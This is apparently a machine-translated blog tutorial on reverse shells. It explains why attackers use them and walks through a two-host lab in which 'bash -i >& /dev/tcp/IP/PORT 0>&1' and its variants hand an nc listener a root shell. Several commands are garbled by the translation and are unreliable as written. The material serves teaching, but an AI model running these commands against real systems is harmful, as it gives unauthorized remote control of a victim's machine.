What is bounce shell?
Rebound shell (reverse shell), the control terminal is listening on a TCP / UDP port, initiating a request to the host port, and a command-line input and output it to the control terminal. reverse shell and telnet, ssh and other standard shell corresponds, in essence, it is the role of client and server networking concepts reversal.
Why should rebound shell?
Host firewall is commonly used because of limited mobility, lack of authority, the port is occupied by other circumstances.
Example: Suppose we attack a machine, open a port of the machine, the attacker in his own machine to connect to the target machine (the target ip: port target machine), which is a more conventional form, we called the positive connection. Remote Desktop, web services, ssh, telnet, and so are the positive connection. So under what circumstances a positive connection can not use it?
There are the following:
1. a client in your network horse, but it is in the LAN, you can not connect directly.
2. ip dynamically change the target machine, you can not continue to control.
3. Since the firewall restrictions, the other machine can send a request, the request can not be received.
4. For viruses, Trojans, and when the victim can be caught, the other's network environment is what kind of situation when switching machines is unknown, so the establishment of a server so that the malicious program active connection, is the best policy.
Then rebounded very good understanding of the attacker specify the server, the victim host the initiative to connect the server program of the attacker, called rebound connection.
==============================================================
Reference :
https://www.zhihu.com/question/24503813 know almost: rebound shell is what ah mean? I looked online for a long time did not explain the basis of the relevant?
Experimental rebound shell
Environment: Two CentOS7.6 server
- Attack end hacker: 10.201.61.194
- Victims end victim: 10.201.61.195
1. The attack ends a listening port:
[root@hacker ~]# nc -lvp 6767
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::6767
Ncat: Listening on 0.0.0.0:6767
2. victims end generate a rebound shell:
[root@victim ~]# bash -i >& /dev/tcp/10.201.61.194/6767 0>&1
3. The attack has acquired end to end victimization of bash:
[root@hacker ~]# nc -lvp 6767
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::6767
Ncat: Listening on 0.0.0.0:6767
Ncat: Connection from 10.201.61.195.
Ncat: Connection from 10.201.61.195:46836.
[root @ victim ~] # // end attacks has been the victim remote interactive shell side
[root@victim ~]# hostname
hostname
victim
Explanation:
1. nc -lvp 6767
-l monitor, -v interaction or output an error message, -p ports. nc is netcat shorthand, be arbitrary TCP / UDP port listener, nc as TCP or UDP server in listening mode designated port.
2. bash -i
-i interactive. I.e., generating an interactive shell (bash).
3. /dev/tcp/IP/PORT
Special device files (Linux everything is a file), the actual file does not exist, it is only bash realized the interface used to implement a network request. Open this file is equivalent to sending a socket calls and transmit data to establish a socket connection, read and write in this document is equivalent to the socket connection.
To analyze rebound shell implementation by four small test:
(PS: Note that the order of performing step)
Test 1:
Victims end:
[root @ victim ~] # the bash -i > /dev/tcp/10.201.61.194/5566 // Step
[root @ victim ~] # hostname // Step
[root @ victim ~] #
Attack end:
[Root @ hacker ~] # nc // The first step -lvp 5566
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::5566
Ncat: Listening on 0.0.0.0:5566
Ncat: Connection from 10.201.61.195.
Ncat: Connection from 10.201.61.195:49018.
victim // Test 1 results: to achieve a standard output side redirect victims to attack end, but not yet implemented in order to control the victim end.
Test 2:
Victims end:
[the victim the root @ ~] # the bash -i < /dev/tcp/10.201.61.194/5566 // Step
[the victim the root @ ~] # hostname // 2 Test Results: implements redirect input terminal to the attack victim end, but the end can not see the attack command execution result.
victim
Attack end:
[root @ hacker ~] # nc -lvp 5566 // Step
Ncat: 7.50 Version (https://nmap.org/ncat)
Ncat: Listening ON ::: 5566
Ncat: Listening ON 0.0.0.0:5566
Ncat: from 10.201.61.195 Connection.
Ncat:. Connection from 10.201.61.195:50412
hostname // third step (end attacks execute commands)
Test 3 :
Victims end:
[root @ victim ~] # the bash -i > /dev/tcp/10.201.61.194/5566 0> &. 1 // Step
[root @ victim ~] # hostname // end echo command injured
[root @ victim ~] # id // victims end echo command
[root @ victim ~] # hahaha // victims end echo command
bash: hahaha: command not found // victims end echo command. Display the output of commands.
[root @ victim ~] #
Attack end:
[root @ hacker ~] # nc -lvp 5566 // Step
Ncat: 7.50 Version (https://nmap.org/ncat)
Ncat: Listening ON ::: 5566
Ncat: Listening ON 0.0.0.0:5566
Ncat: from 10.201.61.195 Connection.
Ncat:. Connection from 10.201.61.195:36792
hostname // third step (Run end attack)
the victim
ID // fourth step (Run side attack)
UID = 0 (the root) GID = 0 (root) Groups = 0 (root)
hahaha // the fifth step (execute a bad command)
// Test Results 3: basic realization of the rebound shell functions. But on the victim side of the machine still echoing the commands executed on the attacker's machine, and the attack ends see no error output command.
Test 4 (in conjunction with the above three tests will be the standard input, standard output, the error output is redirected to attack all end.):
Victims end:
[the victim the root @ ~] # the bash -i > /dev/tcp/10.201.61.194/5566 0>. 1 & 2> &. 1 // second step. Or the bash -i # &> /dev/tcp/10.201.61.194/5566 0> & 1 (Note: &> or> & expressed mixed output, i.e. the output of the standard error output 2 + 1)
Attack end:
[root @ hacker ~] # nc -lvp 5566 // Step
Ncat: 7.50 Version (https://nmap.org/ncat)
Ncat: Listening ON ::: 5566
Ncat: Listening ON 0.0.0.0:5566
Ncat: from 10.201.61.195 Connection.
Ncat:. Connection from 10.201.61.195:51182
[root @ victim ~] # hostname // third step. 4 test results: attack end remote interactive shell has been injured side, and end the victim did not return to command significant attacks ended input ~
hostname
victim
// PS:, seen from Test 4 Comparison Test 3, not only the standard error 2 shows the effect of the error message, there is still echoing effect prompt to enter commands and terminal ~~~
Summary :
This article compiled some information on the rebound shell and experiment to understand the rebound shell principle. In-depth understanding of file descriptors and redirection in order to better understand the rebound shell ~
==============================================================
reference:
https://xz.aliyun.com/t/2549 prophet Community: Linux rebound shell (b) the nature of the shell bounce
https://www.freebuf.com/articles/system/153986.html FREEBUF: Analysis and redirection command rebound Shell